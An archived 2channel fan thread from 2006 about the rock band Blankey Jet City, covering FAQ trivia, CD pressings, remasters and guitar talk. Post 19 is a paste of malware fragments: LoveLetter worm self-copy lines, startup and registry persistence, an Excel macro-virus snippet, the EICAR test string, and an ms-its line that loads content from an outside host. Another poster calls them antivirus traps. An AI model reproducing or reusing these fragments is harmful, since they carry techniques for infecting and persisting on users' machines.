2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

★BLANKEY JET CITY Part47★

1 :伝説の名無しさん:2006/07/08(土) 20:44:32
前スレ
http://music4.2ch.net/test/read.cgi/legend/1148295717/


《よくある質問》
1、ベンジーというあだ名の由来
「グローイングアップ」という映画の主人公の少年と彼が似ていたことから、照井利幸が名付けたもの。
2、『野菜君』とは?
BJC結成以前のこと、プロとして活動していた中村達也のところに挨拶に行った浅井健一。
しかし中村は『浅井です』と言ったのを『野菜くん… ね。』と聞き間違える。
これに由来する、浅井氏の昔のニックネーム。一部のBJCファンの間では、いまだに使われている。
3、浅井健一のバンド歴
スケルトンズ→ロミオズ→スキャッツ→レッドモンキーズ→THE BLANKEY JET CITY
→BLANKEY JET CITY→SHERBET→SHERBETS→AJICO
→浅井健一(実質、JUDEと同じ。)→JUDE
同時進行だったものもあるが、結成した順番だとこうなる。

2 :伝説の名無しさん:2006/07/08(土) 20:45:30
4、「★★★★★★★」の読み方は?
「人殺しの気持ち」

5、「ベンジーのケツの穴まさぐりたい」への答え方は?
「好きなだけまさぐったらええわ」

6、バイク
ベンジー: YAMAHA XS250をベースに、XS400のエンジンを搭載
テリー:ジョッキーシフトのパンヘッド(型名不明) バンブーなエキパイにフッシュテール
達也: 昔ハーレー。ついこないだまでゴリラ。 現在Z550FX

3 :伝説の名無しさん:2006/07/08(土) 20:45:38
にゃんゲト

4 :伝説の名無しさん:2006/07/08(土) 20:47:06
<シングルの初回仕様>

不良少年のうた --------- 8cm ?
TEXAS ---------------- 8cm ?
冬のセーター ----------- 8cm ?
青い花 ----------------- 8cm ?
風になるまで ------------ 8cm ?
Girl/自由 --------------- 8cm ?
くちづけ ---------------- 8cm ?
ガソリンの揺れかた ----- 12cm ?
左ききのBaby ---------- 12cm 白いプラケース
赤いタンバリン ---------- 12cm ジャケが透明プラ板仕様/通常は背景白の紙歌詞カード
小さな恋のメロディー ---- 12cm プラケースにシール
ダンデライオン ----------- 8cm ロゴステッカー封入
SWEET DAYS ---------- 12cm デジパック
ペピン ----------------- 12cm デジパック
SEA SIDE JET CITY ---- 12cm デジパック
SATURDAY NIGHT ----- 12cm デジパック&CDエキストラ

5 :伝説の名無しさん:2006/07/08(土) 20:47:37
<アルバムの初回仕様>

Red Guitar-------金色のケース入り(ベンジーの刺青が印刷)
BANG!----------盤のBANGの部分の色が赤・青・黄/通常は黄色一色
LIVE!------------初回は盤の文字が赤茶色(オレンジっぽい)
C.B.Jim----------?
METAL MOON----トレーが黒(トレーの下に照井さんの写真あり)/通常は白
幸せの鐘--------トレーが黒/通常は白
The SIX---------トレーが透明/通常は黒
SKUNK----------ケースに黄色いシール/通常は歌詞カードに印刷
LOVE FLASH-----3Dジャケット
国境線上--------歌詞カードキラキラ
ロメオ-----------デジパック
HARLEM JETS---デジパック
LAST DANCE----応募葉書付


6 :伝説の名無しさん:2006/07/08(土) 20:49:36
関連スレ

【覚醒しろ!】浅井健一 Part64【ベンジー!】
http://music5.2ch.net/test/read.cgi/musicjm/1147859797/

【ROSSO】照井┃メ━┏┃y―┛~利幸Part2【CARNE】
http://music5.2ch.net/test/read.cgi/musicj/1131027017/

losalios◆中村達也◆part13
http://music5.2ch.net/test/read.cgi/musicjm/1148756404/

7 :伝説の名無しさん:2006/07/08(土) 20:50:09
Residents of JET CITY(JET CITYの住人たち)
http://www.rollingkids.com/sexy/jet.htm

公式
http://bjc.wilddisk.com/



以降コピペが予想されるロッキンオンジャパン事件に関してはここを参照
ttp://www.myagent.ne.jp/~newswave/2002-11-11.htm

8 :伝説の名無しさん:2006/07/08(土) 20:51:57
テンプレここまで

いろいろミスちゃったスマソ

9 :伝説の名無しさん:2006/07/08(土) 21:06:49
【SHERBETS】浅井健一 Part65【JUDE】
http://music5.2ch.net/test/read.cgi/musicjm/1150534830/
今のスレはこっちだけどこのスレももうすぐ1000いくな



10 :伝説の名無しさん:2006/07/08(土) 22:52:47
>>9
のスレでブランキーのCD再発ってあるけどマジかよ?

11 :伝説の名無しさん:2006/07/08(土) 23:06:27
>>10
CD再発っていうとデジタルリマスターでとか?もともとアナログ録音に
こだわってた彼らだけにそれはないと思うので、それ以外で音が良くなる
方法ってあるのか? それだったらメタルムーンは是非買いたいのだが。

12 :伝説の名無しさん:2006/07/08(土) 23:35:45
てるてるみらくる

13 :伝説の名無しさん:2006/07/09(日) 00:21:04
俺もさっきリマスター知った。東芝の頃のはファースト以外でも音しょぼいのあるから
劇的に音質変わってたら俺もメタルムーン欲しいな。
紙ジャケにはならないみたいで残念やけど。

14 :伝説の名無しさん:2006/07/09(日) 00:30:09
これか
http://www.towerrecords.co.jp/sitemap/CSfSearchResults.jsp?keyword=AllCatalog&entry=TOCT-11123%2CTOCT-11122%2CTOCT-11121%2CTOCT-11120%2CTOCT-11119%2CTOCT-11118%2CTOCT-11117%2CTOCT-11116&GOODS_SORT_CD=101&SEARCH_GENRE=ALL&TYPE=&STR=

15 :伝説の名無しさん:2006/07/09(日) 02:40:45
今日はラストダンスの日だね。あれからもう六年か…
楽しかったライブは他にも数あれど、あんなに汗だくになったのは
あの時だけだわ。

16 :伝説の名無しさん:2006/07/09(日) 08:42:01
ラストダンスの帰りにラーメン博物館寄って食ったラーメンの糞まずい味まで忘れられないよ

17 :伝説の名無しさん:2006/07/09(日) 09:49:09
LASTDANCEのCDレンタルしてきたけど選曲が最高だな

18 :伝説の名無しさん:2006/07/09(日) 14:41:19
モンキーストリップの演奏丁寧だね

19 :伝説の名無しさん:2006/07/09(日) 16:21:23
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
ܷܵܶ

20 :伝説の名無しさん:2006/07/09(日) 22:20:02
人々は壊れた時計の針

21 :伝説の名無しさん:2006/07/09(日) 22:31:51
cakeってバンドのぺピン似の曲が入ってるアルバム買ってみたけど
すっごく良かった! ブラックジェニーも入ってたし。

22 :伝説の名無しさん:2006/07/09(日) 22:34:56
そのお得なアルバムのタイトル教えてくれ。どのくらい似てるか聴いてみたい。

23 :伝説の名無しさん:2006/07/09(日) 22:44:30
自…

24 :伝説の名無しさん:2006/07/09(日) 22:57:49
殺をすすめるー

25 :伝説の名無しさん:2006/07/09(日) 23:01:25
ベンジーのエフェクター何使ってるかおせえてくれ!

26 :伝説の名無しさん:2006/07/10(月) 00:57:20
>>25
コピバン厨ウザい

27 :伝説の名無しさん:2006/07/10(月) 03:11:11
22>>
言われないとわからないくらい似てるよ。
fashion nuggetってアルバム。

28 :伝説の名無しさん:2006/07/10(月) 09:47:29
前スレからノートントラップを貼ってるやつは何なの?

29 :伝説の名無しさん:2006/07/10(月) 12:06:39
CAKEってジャンル分けすると何?

30 :伝説の名無しさん:2006/07/10(月) 12:42:21
洋菓子

31 :伝説の名無しさん:2006/07/10(月) 18:03:11
ブランキーって最初聞いたとき、何このアドリブで歌ったみたいな糞な音程はwwって思ったよ。


32 :伝説の名無しさん:2006/07/10(月) 18:15:55
そこがベンジーの凄いとこだよな


33 :伝説の名無しさん:2006/07/10(月) 22:47:40
自分も解散後にブランキー知って
とりあえずネットで試聴したのがロメオで
うはwwwww何これテラヤバスwwwwwwwって思ったな〜懐かしい。

34 :伝説の名無しさん:2006/07/10(月) 23:15:09
東芝のベストは白以外にもあるけど、
ポリドールの黒以外のベストって無いよね・・・
あったら選曲どうする?16曲で


35 :伝説の名無しさん:2006/07/10(月) 23:21:07
とりあえず斜陽とBangと公園は入れる
ディズニーランドとスカンクは入れない

36 :伝説の名無しさん:2006/07/11(火) 00:11:13
最近オケツの話題でないね

37 :伝説の名無しさん:2006/07/11(火) 00:11:28
RED-RUM

38 :伝説の名無しさん:2006/07/11(火) 03:13:57
え、ポリドールの曲を選ぶんじゃないのか?

39 :伝説の名無しさん:2006/07/11(火) 11:30:08
プラネタリウム
PUDDING
SPAGHETTI HAIR
ガソリンの揺かた
デニスホッパー
海を探す
赤いタンバリン
ロメオ
幸せな人
小さな恋のメロディー
Sea Side Jet City
CAMARO
SALINGER
不良の森
Sweet Days
DERRINGER
リス
Come On
黒い宇宙

曲順は適当。

40 :伝説の名無しさん:2006/07/11(火) 12:07:45
カマロはペピンに差し替えてくれ

41 :伝説の名無しさん:2006/07/11(火) 12:17:29
あー、ペピン忘れてたわ。
公式のアルバムの好きな曲、コピペしただけだったからさ。
あとダンデライオンとサラレライも。

42 :伝説の名無しさん:2006/07/11(火) 13:47:56
>>11
デジタルリマスターとアナログ録音へのこだわりは別物だぞ?

43 :伝説の名無しさん:2006/07/12(水) 03:31:29
最近思い出したように聴いてるけど、
なんであんな変な詩書けるんだーと、ベンの能力に怯えてます。

それにしてもいい音のギターだな〜
ブランキーがブレイクした後、グレッチの値段がありえないほど釣り上がって
今でも高いとギターオタが言っていたよ。
グレッチなんぞたいしたギターでもないのに!だって。
そいつはフェンダーバカなんだがね。
なんでベンはグレッチにしたんだろう?安かったのかな?

44 :伝説の名無しさん:2006/07/12(水) 07:37:37
形で選んだらしい。デカくていいとか昔言ってたよ。

45 :伝説の名無しさん:2006/07/12(水) 09:05:15
>>43
デザインかっこいいじゃん

46 :伝説の名無しさん:2006/07/12(水) 11:12:31
ブライアンの影響じゃね

47 :伝説の名無しさん:2006/07/12(水) 13:05:53
なんでグレッチ=ブライアンセッツァーなんだよ
じゃあ小沢健二もブライアンの影響なのか!?
グレッチはストレイキャッツ以前から有名なのに

48 :伝説の名無しさん:2006/07/12(水) 13:34:38
携帯からでスマン。
ずっと前の雑誌に書いてたけど
本当はストラトの音が1番好きで
見た目的に自分に似合ってるのが
グレッチだって書いてた。

49 :伝説の名無しさん:2006/07/12(水) 14:09:04
>>47
グレッチ(fフォール付きの奴)=ブライアンで間違ってないだろ
ボ・ディドリーとかも使ってたけどグレッチをメジャーな存在にしたのは
間違いなくブライアン

50 :伝説の名無しさん:2006/07/12(水) 16:34:10
まあ、グレッチと言えばブライアンだよなあ。あのおっさん以降、使う奴が格段に増えた
俺もその一人だけど
確かにグレッチは大したギターじゃなかったんだけど、
それは70年代くらいまでの話で、今は良いよ
だからまあ当然、ビンテージグレッチはあんま良くないのが多いんだけど


51 :伝説の名無しさん:2006/07/12(水) 21:11:36
>>50
下手糞で買えもしない貧乏人がそんなこと気にしてどうすんの?

52 :伝説の名無しさん:2006/07/12(水) 21:46:39
グレッチといえばチェットアトキンスだろ!
グレッチといえばエディコクランだろ!


53 :伝説の名無しさん:2006/07/12(水) 21:57:15
グレッチといえばデュアン・エディだろ
グレッチといえばボ・ディドリーだろ

54 :伝説の名無しさん:2006/07/12(水) 22:00:07
そんなことはどうでもいいだろ

55 :伝説の名無しさん:2006/07/12(水) 22:17:13
>>43
C.B.JIMのレコーディング時にそれまで使ってたギターのネックが折れたらしいよ
で、その当時のディレクターがたまたま見つけてきたのがグレッチのテネシアン
うちにあるC.B.JIMのバンドスコアに乗ってるインタビューにはそう書いてある
もっと前から使ってた気がするんだけどな

56 :伝説の名無しさん:2006/07/12(水) 22:23:24
昔のベンジーはブライアンの
コスプレしてるよね?

57 :伝説の名無しさん:2006/07/12(水) 22:56:36
あの格好が
ブライアンセッツァーのオリジナルだと思ってるわけではなかろう

58 :伝説の名無しさん:2006/07/12(水) 23:03:41
>>55
今メインで使ってるテネシアンは
デビュー時に新大久保で買ったやつらしいよ。
ネックも過去に2回折って修復してるから
「ネックの折れたギター」って言うのは多分それのことじゃないの。

確か同じタイプのグレッチももう一つ持ってたはずだから
CBJimで購入したのがそのギターかもね。

59 :伝説の名無しさん:2006/07/12(水) 23:40:46
モト冬樹氏ね

60 :伝説の名無しさん:2006/07/12(水) 23:50:01
47よ。何でそんな怒るんだ?ただブライアンの影響じゃないかなと思っただけだろうに。オニオンライス以下じゃ

61 :伝説の名無しさん:2006/07/13(木) 00:33:37
>58
メジャーとの契約金でテネシアン買ったのか?

62 :伝説の名無しさん:2006/07/13(木) 00:47:56
58じゃないが、半年ぐらい前のギターマガジンで会社からデビューにあたって機材揃えろって言われて
金をもらったって書いてあったな・・・
んで楽器屋行って透明のアクリル製ギターかテネシアンか悩んでる時にイカ天見てファンになった女子高生が話しかけてきて
どっちがいいと思う?って聞いたら断然こっち!って言ってテネシアンを勧められたそうな・・・
後ベンジーはデビュー前にアメリカからオールドのホワイトファルコン買ったけどあっちこっちガタが来てて友達に売ったって話もある(後に友達から返してもらって、別のところに売ってオベーションを買った)



63 :伝説の名無しさん:2006/07/13(木) 01:55:43
テネシアンを壊したのは達也。酔っ払って階段から蹴り落とした
で、出来た曲がパイナップルサンド

64 :伝説の名無しさん:2006/07/13(木) 02:07:12
>>63
かわいそうなグレッチ。修理代もバカにならんぞ。

65 :伝説の名無しさん:2006/07/13(木) 02:08:11
あ、テネシアンだった。

66 :伝説の名無しさん:2006/07/13(木) 02:10:05
しまった、一緒だ。ゴメン殴って。

67 :伝説の名無しさん:2006/07/13(木) 02:15:47
そういやイカ天でホワイトファルコン使ってたもんな

68 :伝説の名無しさん:2006/07/13(木) 03:41:24
あれグレッコでしょ?

69 :伝説の名無しさん:2006/07/13(木) 04:58:25
あれはグレッコのオリジナルのフルアコじゃなかった?

70 :伝説の名無しさん:2006/07/13(木) 06:55:52
ジャガーはいつ?

71 :伝説の名無しさん:2006/07/13(木) 10:46:39
ベンジーって腹毛生えてたんだな。

72 :伝説の名無しさん:2006/07/13(木) 12:11:40
達也は燃やしてしまったらしい

73 :伝説の名無しさん:2006/07/13(木) 12:14:13
>>70 たぶんジャズマスター
今月のGIGSっていう雑誌にベンジーがのってて、一緒に写真に写ってる
あんまりいい音しないから使ってないって、昔読んだ雑誌に載ってたな


74 :伝説の名無しさん:2006/07/13(木) 19:49:17
KING & BEGGAR

75 :伝説の名無しさん:2006/07/13(木) 20:46:26
CBJIMの歌詞カードのベンジーが中居くんに見える

76 :伝説の名無しさん:2006/07/13(木) 22:32:03
アムロレイのモデルがベンジーらしいよ

77 :伝説の名無しさん:2006/07/13(木) 22:41:04
ブランキーよりもガンダムのほうが先なんだが

78 :伝説の名無しさん:2006/07/13(木) 23:36:02
藤瀬弟のモデルは間違いなくベンジーだよな?

79 :伝説の名無しさん:2006/07/14(金) 00:08:05
言われてみればそんな気もする

80 :伝説の名無しさん:2006/07/14(金) 00:25:56
藤瀬弟はベンジーがモデル。
BJCの会報でハロルド作石とBJCメンバーの記念写真も載っている

81 :伝説の名無しさん:2006/07/14(金) 00:27:16
萌えたわー
>>71

82 :伝説の名無しさん:2006/07/14(金) 07:23:58
大昔、ヤンマガにもハロルド作石とブランキーが一緒に載ってたね。

83 :伝説の名無しさん:2006/07/14(金) 12:22:46
>>68-69
そだっけか?大昔だから記憶が曖昧だ
なんか最近はライブでブランキーの曲やってるんだってね、ロメオとかディズニーランドとか

84 :伝説の名無しさん:2006/07/14(金) 16:08:13
へたくそジェットジェット

85 :伝説の名無しさん:2006/07/14(金) 18:53:49
ブランキーの曲は解散した後もペピンとかやってたし、ユダができた当時も色々やってた

86 :伝説の名無しさん:2006/07/14(金) 20:08:03
ベンジーインタビューでなんでヒロトはリンダリンダとかやらないんだろうね?
俺は今でもブランキーの曲やってるしヒロトもいい曲だからやらないのは勿体無いみたいな
事言ってたね
再結成はかっこ悪いって言ってる人がそれは如何なものか・・・と俺は思った笑

87 :伝説の名無しさん:2006/07/14(金) 20:47:43
それがベンジー

88 :伝説の名無しさん:2006/07/14(金) 20:52:46
逆にヒロトからベンジーに言ってやって欲しいよ

「ベンジーはなんで照井さんや達也さんと一緒にやらないんだろうね?
あのときのブランキーとは違うかもしれないけど、べつにこだわらなくたっていいじゃない。
おせっかいかもしれないけどさ。
ハイロウズはブルーハーツと比べ続けられたけど
僕はマーシーと一緒にやりたかったんだ。
ベンジーにもかけがえのない仲間がいるなら一緒にやればいいじゃない」って


でも、ベンジーは実際、他の二人のことはそれほど想ってないのかもしれないけどさ


89 :伝説の名無しさん:2006/07/14(金) 21:11:23
照 髪w
http://www.youtube.com/watch?v=3PVrZXf211Y

90 :伝説の名無しさん:2006/07/14(金) 22:16:17
やはり髪下ろさないともうダメなのか・・・

91 :伝説の名無しさん:2006/07/14(金) 22:31:37
ああ
なんかカンフーの人みたいだ
禿でもオールバックにした方が絶対かっこいいのに

92 :伝説の名無しさん:2006/07/14(金) 23:40:58
ベンジーは自己中だから人の事なんて何も思わない

93 :伝説の名無しさん:2006/07/14(金) 23:41:55
髪が痛むんだろうか・・・

94 :伝説の名無しさん:2006/07/14(金) 23:42:09
何も思わない。


湿度だけで俺はいいよ。

95 :伝説の名無しさん:2006/07/15(土) 00:04:47
天使とかと気が合うのさ。膣がきっと好きなんだろうね。

96 :伝説の名無しさん:2006/07/15(土) 01:48:18
愛はいらないの良さが最近分かったよ。


97 :伝説の名無しさん:2006/07/15(土) 09:12:54
ガイゴイガイゴイガイゴイ

98 :伝説の名無しさん:2006/07/15(土) 14:22:29
達也と照ちゃんのリズムだとストレートに歌っちゃってもたないし、昔の歌ってるの見るとストレート過ぎて恥ずかしいってベンジー言ってるけど、偶にはスカンクみたいなストレートシャウトして欲しい…
今のも大人びた感じでいいとは思ってるけど…

99 :伝説の名無しさん:2006/07/15(土) 19:39:25
アユハピの頃に戻って欲しい…

100 :伝説の名無しさん:2006/07/15(土) 20:26:22
俺もその頃に戻りたい

101 :伝説の名無しさん:2006/07/15(土) 20:58:21
ベンジーの発言は一貫して矛盾している。

102 :伝説の名無しさん:2006/07/15(土) 22:23:20
「浅井健一 WORKS」
スペースシャワーTV 8/31(木) 23:00〜24:00
http://www.spaceshowertv.com/sstv/program/special/index.html#asaikenichi

103 :伝説の名無しさん:2006/07/15(土) 23:41:27
ただなのにフェザータッチでつり銭くれてありがとう

104 :伝説の名無しさん:2006/07/16(日) 00:04:22
ここのボーカルって気持ち悪いよ

105 :伝説の名無しさん:2006/07/16(日) 00:46:03
誰かラスフジの3104からのmp3うpして

106 :伝説の名無しさん:2006/07/16(日) 10:50:57
君の手のひらにって素敵

107 :伝説の名無しさん:2006/07/16(日) 16:24:17
おぼんこぼん

108 :伝説の名無しさん:2006/07/16(日) 16:32:24
黒柳徹子ちょっと浅井に似てるw

109 :伝説の名無しさん:2006/07/16(日) 16:56:15
ラスダンの最初の方のベンジーの髪型は
映画版ルパン三世複製人間の回に出てくる奴に似てる

110 :伝説の名無しさん:2006/07/16(日) 17:40:18
マモーか?

111 :伝説の名無しさん:2006/07/16(日) 18:06:32
ミモーじゃね?

112 :伝説の名無しさん:2006/07/16(日) 19:03:10
“アモー"か‥?!

113 :伝説の名無しさん:2006/07/16(日) 19:17:06
ブサなのにハンサム扱いされてるよね

114 :伝説の名無しさん:2006/07/16(日) 19:58:46
EZOで3人でやるってマジですか?

115 :伝説の名無しさん:2006/07/16(日) 20:00:00
青い花みたいな感じの曲って他にないですか?

116 :伝説の名無しさん:2006/07/16(日) 20:09:58
全部聴けばいいじゃん

117 :伝説の名無しさん:2006/07/16(日) 20:13:38
ジョンレノンが近いかな

118 :伝説の名無しさん:2006/07/16(日) 20:29:58
全部なんて聞く気しない
the sixの曲全部聞いたけど、青い花以外まともなのが1つもない。

119 :伝説の名無しさん:2006/07/16(日) 20:36:16
>>118
お前は青春パンクでもきいてろや

120 :伝説の名無しさん:2006/07/16(日) 20:43:50
>>119
そう
馬鹿にしたのが癪に障ったのか

121 :伝説の名無しさん:2006/07/16(日) 20:49:29
>>120
馬鹿に 
というよりも「まとも」なのが好きなら他をあたりなよ

122 :伝説の名無しさん:2006/07/16(日) 21:00:42
浅井社長の歌は最高や!

123 :伝説の名無しさん:2006/07/16(日) 21:06:48
>>118
なんか凄いなそれww
少なくともブランキー向いてないね。
でも答えるけどね。風になるまでとか?

124 :伝説の名無しさん:2006/07/16(日) 21:15:34
>青い花以外まともなのが1つもない

新鮮な意見だw

125 :伝説の名無しさん:2006/07/16(日) 21:30:39
浅井ベンチーってキモいな

126 :伝説の名無しさん:2006/07/16(日) 21:38:38
>>118
スピッツ聴いてたほうが良いんじゃないのか。

127 :伝説の名無しさん:2006/07/16(日) 21:40:34
スピッツはけっこう暗いお

128 :伝説の名無しさん:2006/07/16(日) 21:48:09
青い花、俺結構好き。

129 :伝説の名無しさん:2006/07/16(日) 21:50:50
ガールは気に入らなかったのかな?

130 :伝説の名無しさん:2006/07/16(日) 22:50:13
その昔、スピッツの草野マサムネが海を探すが好きだって答えてたね

131 :伝説の名無しさん:2006/07/16(日) 22:52:09
アスファルトに生まれた白い大根

132 :伝説の名無しさん:2006/07/16(日) 23:12:25
>>131 たしか引き抜かれちゃったんだよな

133 :伝説の名無しさん:2006/07/16(日) 23:39:08
>>131-132
この話はとても悲しい感じがするでしょう
でもど根性大根は二度と返らない

134 :伝説の名無しさん:2006/07/16(日) 23:44:18
ど根性大根は途中から折られたんだよ・・・。

EZOがEROに見えてドキドキしました。

135 :伝説の名無しさん:2006/07/16(日) 23:57:09
ブランキーは後期ベストとラストダンス持ってます。ラストダンスの★★★★★★★とDIJのピストルが好きです。
オリアルはどれから聴いたらいいでしょうか?

136 :伝説の名無しさん:2006/07/16(日) 23:57:46
CBJimが良いんじゃないの。

137 :伝説の名無しさん:2006/07/17(月) 00:08:47
CBクソJimってか
自分で考えろ

138 :伝説の名無しさん:2006/07/17(月) 00:14:25
http://www.youtube.com/watch?v=4OR0kosyr-U&mode=related&search=

139 :伝説の名無しさん:2006/07/17(月) 01:52:37
>>118
初めてブランキー聴くのにあのアルバムは適当じゃない。
「国境線上の蟻」聴いてみて。
青い花に似てるのは、ブランキーじゃないけど、judeのシルベットかな?



140 :伝説の名無しさん:2006/07/17(月) 03:57:26
ブランキーってシングルの切り方がなんだか意味不明じゃない?

141 :伝説の名無しさん:2006/07/17(月) 07:44:33
the sixも好きなんやけどなぁ

142 :伝説の名無しさん:2006/07/17(月) 08:22:09
THE SIX はレコーディングする時期がちょうど低迷期だったからな
スカンクの頃にレコーディングしてたらリアレンジの曲がもっと良い出来だったかも

143 :伝説の名無しさん:2006/07/17(月) 09:05:31
勝手に低迷期にすんなボケ

144 :伝説の名無しさん:2006/07/17(月) 09:58:39
>>135
ライブDVDを見たほうがいい。
俺はブランキーのCD音源に価値を見出せない。

145 :伝説の名無しさん:2006/07/17(月) 13:56:19
あら、そういう人もいるのね。

146 :伝説の名無しさん:2006/07/17(月) 16:24:28
ライブだと達也のリズムが怪しい笑(are you happy?のテキサスとか笑)

147 :伝説の名無しさん:2006/07/17(月) 18:17:09
寝呆けなまこで

148 :伝説の名無しさん:2006/07/17(月) 20:04:47
耳祭り

149 :伝説の名無しさん:2006/07/17(月) 20:26:31
>>112!?

150 :伝説の名無しさん:2006/07/17(月) 21:13:34
ひき肉にしてくれんぞ?

151 :伝説の名無しさん:2006/07/17(月) 21:37:20
ライブだとベンジーの歌詞はもっと怪しい

152 :伝説の名無しさん:2006/07/17(月) 22:11:25
龍神が紛れこんでるみたいだね。

153 :伝説の名無しさん:2006/07/17(月) 22:13:52
兄弟(ブロウ)…

154 :伝説の名無しさん:2006/07/17(月) 22:25:58
イカ天での狂った朝日Youtubeにないの?

155 :伝説の名無しさん:2006/07/17(月) 22:28:17
それが人にものを尋ねる態度か!!

156 :伝説の名無しさん:2006/07/17(月) 22:37:57
ラストダンス(CD)でのパンキーバッドヒップは何度聞いても歌詞の間違いが凄いな笑
決めのところも忘れてシーンとしちゃってるし

157 :伝説の名無しさん:2006/07/17(月) 22:43:23
連投すまん
後ニュースでやってた東関道の話を聞いて豚がにげたぁ!ってベンジーの声が
頭に響いたのは俺だけではないはず・・・笑

158 :伝説の名無しさん:2006/07/17(月) 23:01:35
>>155

ないのでしょうか?

159 :伝説の名無しさん:2006/07/18(火) 01:14:54
>>157
そのニュースのスレがあったら「豚が逃げたー」
って書こうと思ってた

160 :伝説の名無しさん:2006/07/18(火) 02:42:54
なくてよかったな。

161 :伝説の名無しさん:2006/07/18(火) 03:11:47
よかった

162 :伝説の名無しさん:2006/07/18(火) 07:22:05
明るく生きるそれがすべてだから

163 :伝説の名無しさん:2006/07/18(火) 08:28:14
本当にそうおもいたいもんだってばよ

164 :伝説の名無しさん:2006/07/18(火) 12:18:43
>>162
なんて曲の歌詞でしたっけ?

165 :伝説の名無しさん:2006/07/18(火) 13:08:47
はやくりますたーがききたい

166 :伝説の名無しさん:2006/07/18(火) 13:23:09
百64よパイナップルサンドだよ

167 :伝説の名無しさん:2006/07/18(火) 17:18:36
》1000

168 :伝説の名無しさん:2006/07/18(火) 17:52:40
ダンデライオンてPV撮影した日とジャケット撮影した日とかなりのタイムラグあるんですか?
ベンジーの顔のむくみ具合が別人なんだが


169 :伝説の名無しさん:2006/07/18(火) 19:54:27
スウィートデイズのPVのベンジーはちょっと眠そう。

170 :伝説の名無しさん:2006/07/18(火) 20:37:29
狂った朝日は無いのですか?

171 :伝説の名無しさん:2006/07/18(火) 20:49:43
ポイ捨てやめたら誰かがうPしてくれるよ

172 :伝説の名無しさん:2006/07/18(火) 21:15:58
ダンデライオンのPVをyoutubeじゃなくて、2ちゃんでみれると聞いたのですが…

173 :伝説の名無しさん:2006/07/18(火) 22:53:25
ここでピザを配達してくれると聞いたのですが?

174 :伝説の名無しさん:2006/07/18(火) 23:04:16
NHK FM悪いひとたちキター!

175 :伝説の名無しさん:2006/07/18(火) 23:09:01
何度も聴いた曲なのにめちゃめちゃ鳥肌が立ってる…

176 :伝説の名無しさん:2006/07/18(火) 23:54:40
俺は悪いひとたち嫌いだ。一生聴けなくてもいいくらい。

177 :伝説の名無しさん:2006/07/19(水) 00:04:44
俺なら二人の旅だなーと思ったらベンジー!!
嬉しかったよ。好きだから流してほしいなって丁度思ってたからなんだけど。

しかしベンジー、ラジオ下手だな……椎名林檎と通じる下手さがある……


178 :伝説の名無しさん:2006/07/19(水) 00:16:53
だがそれがいい

179 :伝説の名無しさん:2006/07/19(水) 00:20:19
ベンジーが目指す日本ってもしかすると、昔の日本
北朝鮮の国みたいなの?全員でマンセーする
みんな同じ軍隊みたいな そんなの嫌だ。

彦星と織姫

なわけねぇーだろ!大丈夫かおまえ。
マンセーって何?


180 :伝説の名無しさん:2006/07/19(水) 00:23:06
達也に関する質問とその答ってどういう内容だったの?

181 :伝説の名無しさん:2006/07/19(水) 00:25:50
>>180
ずーっと・・・大好きだよ

182 :伝説の名無しさん:2006/07/19(水) 00:34:33
でも酔っ払うとうっとおしいってさ。

183 :伝説の名無しさん:2006/07/19(水) 00:58:03
ベンジー達也でオナニーしそう

184 :伝説の名無しさん:2006/07/19(水) 01:16:27
奥さんも達也似だしね

185 :伝説の名無しさん:2006/07/19(水) 01:24:07
危険すぎる 草野キッドでタイアップされてる

186 :伝説の名無しさん:2006/07/19(水) 01:40:07
俺は照井さんでオナニーしてるよ

187 :伝説の名無しさん:2006/07/19(水) 18:23:51
すんな!

188 :伝説の名無しさん:2006/07/19(水) 20:47:32
どこから見たってイカしてるぜ

189 :伝説の名無しさん:2006/07/19(水) 21:29:47
イカ臭い

190 :伝説の名無しさん:2006/07/19(水) 21:29:54
思い出は雪だから

191 :伝説の名無しさん:2006/07/19(水) 21:51:35
二人の旅

192 :伝説の名無しさん:2006/07/19(水) 21:55:31
イカ臭い手のひら見て ビニールパンツに擦りつけた〜♪

193 :伝説の名無しさん:2006/07/19(水) 22:21:08
イカをぶっ放したくなったら呼んでくれよ


194 :伝説の名無しさん:2006/07/19(水) 22:24:25
イカで悪かったな!

195 :伝説の名無しさん:2006/07/19(水) 22:27:40
俺はイカ臭いイカれたロマンティスト

196 :伝説の名無しさん:2006/07/19(水) 22:28:17
PUNKY BAD HIP

197 :伝説の名無しさん:2006/07/19(水) 22:36:46
郵便番号ー!!

198 :伝説の名無しさん:2006/07/19(水) 22:48:49
やばいたすけてたsl;

199 :伝説の名無しさん:2006/07/19(水) 23:13:03
今日は疲れた…
少し休ませてくれ…

200 :伝説の名無しさん:2006/07/19(水) 23:17:44
今思えば、なぜあの頃はキリ番ゲットがあんなにも楽しかったんだろうか

201 :伝説の名無しさん:2006/07/19(水) 23:25:44
ソーダ水の粒のように 楽しそうな日々は流れる

